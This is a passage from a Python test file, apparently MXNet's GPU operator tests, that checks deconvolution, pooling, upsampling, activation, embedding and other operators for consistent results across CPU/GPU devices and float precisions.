ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. https://github.com/apache/incubator-mxnet/issues/11839")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over the data sets of different float types is problematic
# as one max value in a float32 data set may not be the max value in a float16 data set.
# This function will not be called.
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/11517")
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid',
global_pool=False, p_value=2, count_include_pad=True, tol=None):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool', p_value=p_value, count_include_pad=count_include_pad))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, p_value=p_value, cudnn_off=False,
name='pool', count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, p_value=p_value,
cudnn_off=False, name='pool', count_include_pad=count_include_pad))
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_1d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
def test_2d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value)
else:
if count_include_pad:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
else:
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False,
count_include_pad=count_include_pad)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
if pool_type == 'lp':
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value)
else:
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, count_include_pad=count_include_pad)
def test_3d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
test_1d_pooling('max')
test_1d_pooling('avg', count_include_pad=True)
test_1d_pooling('avg', count_include_pad=False)
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg', count_include_pad=True)
test_2d_pooling('avg', count_include_pad=False)
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
test_3d_pooling('max')
test_3d_pooling('avg', count_include_pad=True)
test_3d_pooling('avg', count_include_pad=False)
test_3d_pooling('sum')
test_3d_pooling('lp', p_value=1)
test_3d_pooling('lp', p_value=2)
test_3d_pooling('lp', p_value=3)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
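# compare global pooling computed with and without an explicit kernel/pad/stride,
# on CPU and on GPU with cuDNN both enabled and disabled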
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
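# low_pad/high_pad widen the sampled index range slightly beyond [0, V) to exercise
# out-of-range index handling (the uint8 case below passes low_pad=0, since uint8 cannot go negative)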
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
